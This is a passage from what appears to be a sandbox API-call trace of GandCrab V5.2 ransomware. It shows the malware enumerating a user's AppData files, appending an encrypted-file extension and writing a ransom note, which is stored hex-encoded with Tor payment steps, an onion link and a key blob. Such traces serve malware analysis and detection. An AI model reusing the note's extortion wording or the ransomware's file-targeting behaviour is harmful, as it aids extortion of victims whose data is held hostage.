fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x259e840) returned 0x5037f8 [0070.374] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0070.374] FindNextFileW (in: hFindFile=0x5037f8, lpFindFileData=0x259e840 | out: lpFindFileData=0x259e840) returned 1 [0070.374] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0070.374] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0070.374] FindNextFileW (in: hFindFile=0x5037f8, lpFindFileData=0x259e840 | out: lpFindFileData=0x259e840) returned 1 [0070.374] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2=".") returned 1 [0070.374] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2="..") returned 1 [0070.374] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\", lpString2="d2ca4a09d2ca4deb61a.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\d2ca4a09d2ca4deb61a.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\d2ca4a09d2ca4deb61a.lock" [0070.374] lstrlenW (lpString=".titwmvjl") returned 9 [0070.374] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\d2ca4a09d2ca4deb61a.lock") returned 109 [0070.374] VirtualAlloc (lpAddress=0x0, dwSize=0x11a, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0070.374] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\d2ca4a09d2ca4deb61a.lock.titwmvjl") returned 118 [0070.374] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\d2ca4a09d2ca4deb61a.lock") returned 109 [0070.374] lstrlenW (lpString=".lock") returned 5 [0070.374] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0070.374] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".lock ") returned 6 [0070.374] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0070.375] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0070.375] FindNextFileW (in: hFindFile=0x5037f8, lpFindFileData=0x259e840 | out: lpFindFileData=0x259e840) returned 1 [0070.375] lstrcmpW (lpString1="flashplayer", lpString2=".") returned 1 [0070.375] lstrcmpW (lpString1="flashplayer", lpString2="..") returned 1 [0070.375] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\", lpString2="flashplayer" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer" [0070.375] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\" [0070.375] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x25d0000 [0070.375] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0070.375] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0070.375] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0070.375] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0070.375] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0070.376] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0070.376] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0070.376] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0070.376] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0070.376] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0070.376] wsprintfW (in: param_1=0x25d0200, param_2="%s\\%s-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\\\TITWMVJL-DECRYPT.txt") returned 118 [0070.376] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\\\TITWMVJL-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\macromedia\\flash player\\macromedia.com\\support\\flashplayer\\titwmvjl-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2d4 [0070.377] lstrlenW (lpString="\xfeff\x2d\x2d\x2d\x3d\x20\x20\x20\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x56\x35\x2e\x32\x20\x20\x20\x20\x3d\x2d\x2d\x2d\x20\x0d\x0a\x0d\x0a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x55\x4e\x44\x45\x52\x20\x4e\x4f\x20\x43\x49\x52\x43\x55\x4d\x53\x54\x41\x4e\x43\x45\x53\x20\x44\x4f\x20\x4e\x4f\x54\x20\x44\x45\x4c\x45\x54\x45\x20\x54\x48\x49\x53\x20\x46\x49\x4c\x45\x2c\x20\x55\x4e\x54\x49\x4c\x20\x41\x4c\x4c\x20\x59\x4f\x55\x52\x20\x44\x41\x54\x41\x20\x49\x53\x20\x52\x45\x43\x4f\x56\x45\x52\x45\x44\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x09\x2a\x2a\x2a\x2a\x2a\x46\x41\x49\x4c\x49\x4e\x47\x20\x54\x4f\x20\x44\x4f\x20\x53\x4f\x2c\x20\x57\x49\x4c\x4c\x20\x52\x45\x53\x55\x4c\x54\x20\x49\x4e\x20\x59\x4f\x55\x52\x20\x53\x59\x53\x54\x45\x4d\x20\x43\x4f\x52\x52\x55\x50\x54\x49\x4f\x4e\x2c\x20\x49\x46\x20\x54\x48\x45\x52\x45\x20\x41\x52\x45\x20\x44\x45\x43\x52\x59\x50\x54\x49\x4f\x4e\x20\x45\x52\x52\x4f\x52\x53\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x41\x74\x74\x65\x6e\x74\x69\x6f\x6e\x21\x20\x0d\x0a\x0d\x0a\x41\x6c\x6c\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2c\x20\x64\x6f\x63\x75\x6d\x65\x6e\x74\x73\x2c\x20\x70\x68\x6f\x74\x6f\x73\x2c\x20\x64\x61\x74\x61\x62\x61\x73\x65\x73\x20\x61\x6e\x64\x20\x6f\x74\x68\x65\x72\x20\x69\x6d\x70\x6f\x72\x74\x61\x6e\x74\x20\x66\x69\x6c\x65\x73\x20\x61\x72\x65\x20\x65\x6e\x63\x72\x79\x70\x74\x65\x64\x20\x61\x6e\x64\x20\x68\x61\x76\x65\x20\x74\x68\x65\x20\x65\x78\x74\x65\x6e\x73\x69\x6f\x6e\x3a\x20\x2e\x54\x49\x54\x57\x4d\x56\x4a\x4c\x20\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x6f\x6e\x6c\x79\x20\x6d\x65\x74\x68\x6f\x64\x20\x6f\x66\x20\x72\x65\x63\x6f\x76\x65\x72\x69\x6e\x67\x20\x66\x69\x6c\x65\x73\x20\x69\x73\x20\x74\x6f\x20\x70\x75\x72\x63\x68\x61\x73\x65\x20\x61\x6e\x20\x75\x6e\x69\x71\x75\x65\x20\x70\x72\x69\x76\x61\x74\x65\x20\x6b\x65\x79\x2e\x20\x4f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x67\x69\x76\x65\x20\x79\x6f\x75\x20\x74\x68\x69\x73\x20\x6b\x65\x79\x20\x61\x6e\x64\x20\x6f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x72\x65\x63\x6f\x76\x65\x72\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2e\x0d\x0a\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x73\x65\x72\x76\x65\x72\x20\x77\x69\x74\x68\x20\x79\x6f\x75\x72\x20\x6b\x65\x79\x20\x69\x73\x20\x69\x6e\x20\x61\x20\x63\x6c\x6f\x73\x65\x64\x20\x6e\x65\x74\x77\x6f\x72\x6b\x20\x54\x4f\x52\x2e\x20\x59\x6f\x75\x20\x63\x61\x6e\x20\x67\x65\x74\x20\x74\x68\x65\x72\x65\x20\x62\x79\x20\x74\x68\x65\x20\x66\x6f\x6c\x6c\x6f\x77\x69\x6e\x67\x20\x77\x61\x79\x73\x3a\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x7c\x20\x30\x2e\x20\x44\x6f\x77\x6e\x6c\x6f\x61\x64\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x2d\x20\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x74\x6f\x72\x70\x72\x6f\x6a\x65\x63\x74\x2e\x6f\x72\x67\x2f\x20\x0d\x0a\x0d\x0a\x7c\x20\x31\x2e\x20\x49\x6e\x73\x74\x61\x6c\x6c\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x32\x2e\x20\x4f\x70\x65\x6e\x20\x54\x6f\x72\x20\x42\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x33\x2e\x20\x4f\x70\x65\x6e\x20\x6c\x69\x6e\x6b\x20\x69\x6e\x20\x54\x4f\x52\x20\x62\x72\x6f\x77\x73\x65\x72\x3a\x20\x20\x20\x68\x74\x74\x70\x3a\x2f\x2f\x67\x61\x6e\x64\x63\x72\x61\x62\x6d\x66\x65\x36\x6d\x6e\x65\x66\x2e\x6f\x6e\x69\x6f\x6e\x2f\x39\x39\x38\x61\x32\x66\x34\x35\x64\x32\x63\x61\x34\x64\x65\x66\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x7c\x20\x34\x2e\x20\x46\x6f\x6c\x6c\x6f\x77\x20\x74\x68\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x74\x68\x69\x73\x20\x70\x61\x67\x65\x20\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x4f\x6e\x20\x6f\x75\x72\x20\x70\x61\x67\x65\x20\x79\x6f\x75\x20\x77\x69\x6c\x6c\x20\x73\x65\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x70\x61\x79\x6d\x65\x6e\x74\x20\x61\x6e\x64\x20\x67\x65\x74\x20\x74\x68\x65\x20\x6f\x70\x70\x6f\x72\x74\x75\x6e\x69\x74\x79\x20\x74\x6f\x20\x64\x65\x63\x72\x79\x70\x74\x20\x31\x20\x66\x69\x6c\x65\x20\x66\x6f\x72\x20\x66\x72\x65\x65\x2e\x20\x0d\x0a\x0d\x0a\x0d\x0a\x41\x54\x54\x45\x4e\x54\x49\x4f\x4e\x21\x0d\x0a\x0d\x0a\x49\x4e\x20\x4f\x52\x44\x45\x52\x20\x54\x4f\x20\x50\x52\x45\x56\x45\x4e\x54\x20\x44\x41\x54\x41\x20\x44\x41\x4d\x41\x47\x45\x3a\x0d\x0a\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x4d\x4f\x44\x49\x46\x59\x20\x45\x4e\x43\x52\x59\x50\x54\x45\x44\x20\x46\x49\x4c\x45\x53\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x43\x48\x41\x4e\x47\x45\x20\x44\x41\x54\x41\x20\x42\x45\x4c\x4f\x57\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x6c\x41\x51\x41\x41\x42\x42\x6a\x58\x74\x68\x4a\x35\x51\x30\x77\x50\x44\x4f\x69\x52\x2f\x55\x55\x71\x42\x6a\x71\x4e\x47\x47\x52\x4d\x53\x45\x54\x66\x6e\x4b\x46\x4e\x2f\x77\x43\x30\x5a\x32\x79\x38\x75\x58\x4e\x4b\x2f\x63\x51\x52\x78\x51\x2b\x75\x78\x6a\x76\x48\x59\x6f\x52\x4e\x57\x4b\x4f\x77\x79\x70\x66\x53\x6e\x77\x69\x73\x61\x7a\x66\x6f\x32\x49\x75\x35\x76\x57\x57\x2b\x52\x43\x6b\x47\x47\x42\x31\x47\x6e\x65\x73\x51\x6b\x51\x77\x75\x54\x32\x41\x5a\x78\x56\x78\x35\x51\x59\x34\x69\x65\x2b\x6c\x65\x57\x2f\x4d\x5a\x41\x77\x47\x50\x70\x7a\x38\x2f\x37\x64\x5a\x77\x6f\x4c\x2b\x55\x71\x71\x4f\x77\x4d\x70\x54\x47\x33\x2b\x41\x6e\x76\x45\x51\x33\x4c\x4d\x6e\x49\x69\x51\x63\x70\x34\x48\x44\x66\x64\x33\x38\x4d\x50\x52\x43\x73\x52\x36\x67\x71\x63\x49\x48\x6f\x42\x70\x55\x4c\x77\x43\x33\x47\x6d\x37\x78\x7a\x74\x5a\x42\x69\x48\x47\x5a\x67\x5a\x56\x37\x4c\x6e\x61\x67\x51\x6b\x72\x4f\x41\x6c\x77\x54\x31\x36\x69\x70\x71\x4c\x31\x7a\x58\x54\x34\x6b\x4f\x79\x47\x45\x5a\x4c\x53\x6c\x71\x36\x48\x52\x57\x72\x52\x4a\x6b\x59\x53\x51\x35\x7a\x4c\x74\x50\x31\x54\x6b\x34\x68\x6d\x6d\x42\x51\x31\x66\x6f\x6a\x57\x46\x72\x63\x6f\x54\x34\x36\x78\x63\x76\x57\x2b\x33\x53\x33\x30\x6e\x56\x30\x46\x43\x51\x59\x64\x6a\x35\x68\x48\x66\x62\x50\x6c\x62\x4f\x52\x5a\x72\x69\x34\x6e\x2b\x65\x55\x43\x49\x6c\x46\x31\x74\x4b\x78\x62\x45\x69\x51\x74\x4a\x4e\x74\x66\x66\x74\x31\x76\x6b\x59\x31\x62\x6e\x78\x49\x64\x74\x45\x74\x57\x62\x49\x4e\x77\x6c\x75\x6e\x2f\x31\x39\x37\x67\x4f\x72\x72\x49\x58\x4a\x2b\x45\x70\x37\x61\x31\x73\x34\x68\x41\x54\x32\x6b\x45\x6b\x6d\x31\x48\x55\x4e\x39\x39\x46\x55\x4d\x7a\x2b\x49\x73\x51\x45\x4b\x35\x41\x44\x59\x6d\x35\x4a\x73\x42\x55\x61\x63\x59\x6c\x58\x52\x65\x77\x77\x78\x4e\x41\x55\x67\x6b\x77\x54\x51\x31\x69\x78\x57\x48\x63\x68\x36\x4c\x4e\x66\x6f\x46\x62\x78\x2f\x59\x30\x51\x67\x6c\x59\x47\x6c\x37\x36\x62\x4c\x67\x6c\x6a\x67\x6c\x50\x69\x61\x72\x2b\x46\x4d\x6d\x73\x4a\x6b\x48\x44\x78\x58\x46\x41\x64\x70\x56\x50\x4d\x4b\x54\x2b\x50\x70\x63\x6e\x32\x67\x31\x52\x65\x6f\x6d\x79\x5a\x73\x41\x77\x33\x30\x68\x4e\x4d\x79\x59\x43\x74\x79\x7a\x59\x56\x6d\x51\x7a\x4e\x56\x56\x77\x65\x76\x4d\x6b\x70\x71\x33\x44\x66\x76\x30\x76\x48\x65\x43\x6a\x58\x63\x30\x71\x67\x72\x38\x48\x53\x78\x6f\x57\x53\x6c\x56\x42\x7a\x55\x4c\x72\x47\x64\x77\x71\x7a\x61\x62\x59\x79\x6f\x72\x78\x32\x77\x62\x32\x6c\x50\x71\x6e\x43\x73\x4c\x2f\x59\x4f\x74\x63\x72\x69\x65\x50\x62\x77\x73\x57\x59\x46\x5a\x51\x47\x46\x63\x31\x4a\x6f\x71\x4a\x4a\x5a\x35\x4a\x74\x74\x4a\x35\x31\x45\x4c\x44\x52\x43\x4e\x4d\x44\x68\x74\x5a\x76\x42\x66\x61\x49\x7a\x65\x39\x54\x5a\x4c\x52\x61\x43\x42\x69\x30\x4d\x4a\x68\x54\x57\x30\x38\x74\x63\x66\x54\x6f\x62\x4a\x76\x4a\x30\x4d\x39\x34\x56\x62\x51\x44\x76\x2b\x4e\x51\x37\x6e\x6b\x78\x69\x35\x53\x33\x38\x67\x32\x46\x72\x4d\x38\x48\x75\x66\x71\x71\x49\x34\x5a\x67\x4c\x6f\x71\x43\x74\x45\x5a\x44\x67\x69\x62\x74\x42\x77\x51\x7a\x6d\x77\x30\x55\x2b\x64\x2f\x66\x69\x6d\x4d\x4e\x57\x66\x77\x4f\x55\x35\x65\x36\x77\x50\x4e\x6a\x50\x48\x5a\x6a\x73\x57\x38\x2f\x34\x48\x66\x30\x66\x67\x58\x41\x76\x42\x32\x2b\x67\x6b\x76\x52\x73\x75\x48\x53\x69\x75\x57\x53\x30\x5a\x78\x7a\x2f\x41\x42\x33\x4e\x69\x47\x4f\x64\x5a\x50\x64\x78\x72\x71\x4b\x71\x59\x49\x42\x4f\x6b\x4b\x35\x47\x48\x36\x6e\x39\x31\x51\x69\x74\x2f\x43\x66\x46\x66\x4e\x43\x68\x51\x59\x79\x73\x59\x48\x69\x45\x55\x31\x6d\x43\x4a\x2f\x46\x2f\x42\x6d\x65\x4a\x79\x37\x74\x41\x30\x55\x72\x62\x72\x6f\x4c\x53\x66\x45\x74\x7a\x53\x78\x63\x36\x4e\x73\x54\x48\x41\x65\x65\x6d\x48\x6e\x4e\x77\x38\x6d\x4c\x56\x41\x70\x52\x6e\x68\x50\x42\x36\x73\x36\x69\x5a\x66\x59\x6b\x62\x6f\x44\x4c\x45\x37\x64\x72\x56\x44\x6c\x52\x72\x66\x7a\x62\x6f\x63\x31\x56\x6e\x47\x76\x46\x66\x46\x42\x66\x2b\x5a\x37\x6b\x2b\x57\x55\x76\x6b\x6b\x68\x63\x41\x43\x5a\x69\x4b\x74\x6c\x50\x62\x70\x35\x34\x53\x2f\x73\x2b\x55\x73\x6d\x4e\x48\x6a\x55\x4e\x52\x36\x44\x78\x53\x49\x32\x31\x75\x61\x45\x50\x32\x4d\x30\x71\x75\x57\x53\x65\x46\x4a\x38\x77\x76\x61\x2b\x6e\x2f\x6c\x47\x35\x58\x75\x4c\x78\x4b\x4d\x59\x53\x44\x48\x4f\x61\x39\x79\x73\x34\x31\x48\x69\x51\x7a\x43\x33\x41\x33\x52\x67\x73\x2f\x78\x58\x4f\x74\x66\x4d\x31\x78\x6b\x56\x4d\x65\x6c\x5a\x78\x39\x64\x67\x6c\x6f\x66\x33\x34\x4a\x34\x47\x61\x6f\x45\x37\x53\x64\x34\x75\x41\x32\x6b\x79\x61\x4c\x76\x57\x62\x44\x43\x68\x55\x38\x5a\x46\x48\x48\x2b\x4c\x4f\x43\x66\x56\x41\x5a\x61\x48\x34\x55\x6e\x42\x65\x48\x63\x37\x68\x70\x36\x43\x53\x6a\x30\x4b\x77\x73\x31\x68\x30\x31\x46\x63\x58\x67\x74\x76\x6a\x43\x6e\x41\x70\x6a\x55\x37\x46\x72\x59\x53\x42\x43\x72\x77\x7a\x53\x73\x58\x4f\x55\x6b\x36\x41\x43\x34\x37\x41\x69\x56\x69\x48\x2f\x71\x45\x66\x42\x34\x44\x73\x66\x33\x72\x4e\x59\x38\x4a\x44\x62\x51\x54\x44\x72\x73\x57\x7a\x49\x39\x6f\x62\x71\x4e\x53\x4f\x46\x65\x2f\x4a\x4f\x73\x64\x4e\x4e\x56\x6c\x78\x39\x67\x51\x31\x79\x57\x59\x38\x4e\x65\x33\x51\x33\x76\x71\x62\x32\x61\x4e\x67\x6c\x67\x35\x2b\x6d\x6e\x66\x72\x4f\x50\x62\x51\x4a\x33\x66\x36\x53\x48\x79\x52\x53\x63\x68\x6f\x44\x72\x4a\x66\x7a\x38\x43\x69\x78\x75\x39\x53\x6b\x39\x38\x44\x59\x57\x66\x6a\x6e\x73\x70\x75\x35\x59\x64\x2f\x50\x78\x47\x44\x32\x55\x4f\x62\x6b\x30\x62\x68\x65\x4d\x78\x68\x52\x69\x73\x42\x63\x39\x42\x63\x7a\x53\x4f\x4c\x2b\x36\x74\x6c\x65\x62\x68\x42\x6d\x54\x68\x38\x4c\x46\x61\x56\x6f\x6d\x4b\x31\x53\x38\x75\x7a\x74\x73\x68\x52\x56\x63\x4f\x4a\x68\x70\x37\x6f\x2b\x48\x56\x35\x64\x51\x54\x35\x77\x41\x4c\x53\x79\x4c\x36\x67\x4e\x52\x47\x6e\x4f\x6a\x35\x34\x58\x51\x36\x75\x35\x36\x48\x2f\x70\x6a\x63\x2b\x54\x4b\x6c\x59\x30\x61\x57\x52\x76\x38\x76\x65\x63\x59\x44\x52\x44\x48\x4c\x55\x6e\x45\x48\x41\x42\x4c\x46\x71\x4a\x50\x36\x58\x79\x64\x31\x48\x53\x57\x32\x36\x4b\x65\x74\x6a\x56\x37\x4b\x6e\x42\x49\x68\x39\x46\x5a\x68\x67\x6b\x61\x64\x68\x71\x4f\x57\x75\x55\x67\x66\x6f\x53\x6f\x62\x72\x32\x61\x4d\x37\x59\x4f\x6a\x67\x5a\x52\x68\x44\x69\x6e\x59\x62\x31\x73\x54\x49\x49\x77\x62\x6d\x63\x64\x6f\x55\x45\x45\x62\x6a\x4c\x50\x7a\x33\x35\x2f\x70\x44\x62\x33\x72\x4b\x2f\x6a\x65\x53\x62\x43\x61\x70\x43\x68\x33\x7a\x43\x66\x66\x48\x72\x31\x68\x39\x58\x59\x57\x4c\x37\x6f\x67\x6c\x4b\x31\x49\x79\x39\x53\x6e\x50\x7a\x72\x4e\x74\x77\x35\x69\x6e\x6e\x35\x67\x46\x2f\x54\x62\x32\x32\x2f\x64\x78\x34\x2b\x32\x53\x61\x55\x48\x50\x78\x54\x79\x70\x4f\x79\x6b\x62\x66\x6a\x72\x57\x7a\x4e\x79\x4e\x34\x74\x38\x54\x70\x4a\x6d\x6a\x64\x76\x6d\x31\x41\x6c\x38\x53\x54\x53\x51\x73\x76\x76\x52\x55\x37\x45\x43\x61\x52\x37\x6e\x4c\x32\x41\x64\x42\x4e\x36\x4a\x32\x6d\x35\x6a\x6d\x64\x78\x54\x5a\x79\x64\x77\x4a\x50\x6e\x36\x31\x63\x70\x46\x39\x6b\x71\x44\x77\x2f\x74\x76\x4c\x4f\x4c\x4a\x43\x43\x7a\x56\x32\x5a\x44\x48\x33\x4f\x49\x6d\x56\x75\x69\x6e\x67\x31\x6c\x31\x65\x62\x63\x65\x42\x53\x45\x6a\x6f\x36\x52\x61\x36\x7a\x67\x75\x31\x4d\x6a\x32\x63\x58\x39\x57\x4d\x77\x31\x50\x78\x30\x53\x64\x32\x6c\x4d\x75\x77\x6d\x51\x6b\x34\x30\x36\x4f\x49\x64\x4c\x64\x55\x64\x34\x67\x6c\x71\x66\x30\x55\x48\x72\x38\x64\x66\x47\x4a\x79\x66\x62\x61\x4a\x45\x4c\x63\x74\x56\x36\x67\x36\x2b\x6e\x35\x66\x44\x71\x36\x56\x51\x41\x30\x72\x78\x78\x74\x79\x76\x6b\x43\x74\x68\x6d\x52\x4c\x73\x54\x67\x66\x4f\x6f\x58\x65\x34\x47\x37\x68\x39\x69\x4e\x75\x65\x73\x6f\x4d\x72\x30\x50\x6f\x61\x38\x6b\x4a\x5a\x54\x56\x68\x66\x33\x77\x54\x2f\x75\x75\x79\x64\x4d\x79\x55\x70\x63\x6c\x53\x49\x6a\x71\x2b\x66\x55\x49\x52\x72\x2b\x37\x6b\x2f\x57\x39\x4f\x39\x56\x73\x79\x32\x4e\x63\x78\x35\x70\x66\x2b\x53\x2b\x4d\x72\x4c\x31\x41\x6d\x35\x52\x51\x69\x33\x63\x36\x78\x46\x65\x54\x78\x33\x4d\x63\x5a\x52\x38\x30\x6e\x56\x69\x6e\x68\x75\x59\x6c\x69\x52\x51\x68\x4b\x4e\x6f\x4e\x57\x49\x32\x67\x48\x61\x47\x36\x6c\x52\x75\x7a\x2b\x51\x68\x47\x30\x52\x70\x4d\x59\x62\x7a\x42\x67\x4f\x6a\x35\x68\x69\x2f\x63\x63\x79\x55\x79\x68\x4d\x35\x66\x55\x49\x67\x63\x4a\x31\x39\x6c\x50\x64\x63\x6d\x76\x69\x78\x47\x6c\x6b\x35\x52\x38\x72\x6b\x32\x5a\x66\x78\x68\x4a\x78\x72\x46\x49\x75\x4c\x51\x54\x73\x52\x72\x61\x69\x77\x63\x44\x4d\x54\x41\x6d\x39\x63\x38\x6b\x64\x72\x2f\x59\x66\x34\x51\x6e\x2b\x62\x76\x37\x79\x4a\x5a\x34\x59\x58\x67\x42\x38\x45\x64\x6c\x31\x58\x64\x53\x6e\x4d\x72\x55\x50\x56\x35\x6f\x72\x63\x42\x78\x33\x32\x65\x73\x48\x6c\x31\x62\x46\x48\x6b\x65\x73\x39\x5a\x39\x66\x77\x6a\x46\x46\x78\x35\x42\x2f\x43\x72\x79\x6e\x36\x49\x30\x62\x54\x68\x36\x53\x78\x71\x78\x53\x4d\x4b\x66\x61\x77\x6c\x59\x6a\x57\x52\x79\x70\x35\x79\x58\x74\x4e\x69\x62\x62\x2b\x63\x7a\x78\x54\x77\x67\x30\x35\x57\x45\x56\x69\x44\x6a\x32\x5a\x4d\x35\x56\x46\x45\x35\x67\x39\x6a\x56\x78\x31\x7a\x4c\x67\x4c\x36\x72\x45\x6f\x78\x76\x62\x50\x33\x2f\x6f\x57\x73\x72\x33\x72\x72\x35\x38\x63\x71\x62\x45\x36\x49\x49\x48\x34\x6b\x33\x74\x74\x34\x75\x37\x69\x71\x7a\x66\x55\x6b\x4a\x6d\x48\x2b\x38\x31\x76\x5a\x62\x56\x7a\x59\x48\x63\x36\x48\x51\x4c\x2f\x56\x4c\x6d\x74\x2b\x59\x37\x68\x52\x6b\x36\x79\x6f\x72\x53\x6a\x31\x70\x6d\x69\x50\x46\x72\x58\x4c\x39\x39\x57\x72\x62\x6c\x41\x59\x36\x4e\x71\x79\x68\x32\x6d\x78\x2f\x6a\x4b\x44\x58\x4d\x5a\x7a\x64\x6c\x55\x51\x32\x4d\x35\x67\x6a\x56\x6c\x38\x36\x6c\x4e\x43\x6f\x33\x37\x4c\x44\x4c\x56\x48\x55\x4a\x64\x38\x73\x75\x41\x37\x78\x48\x61\x76\x47\x4b\x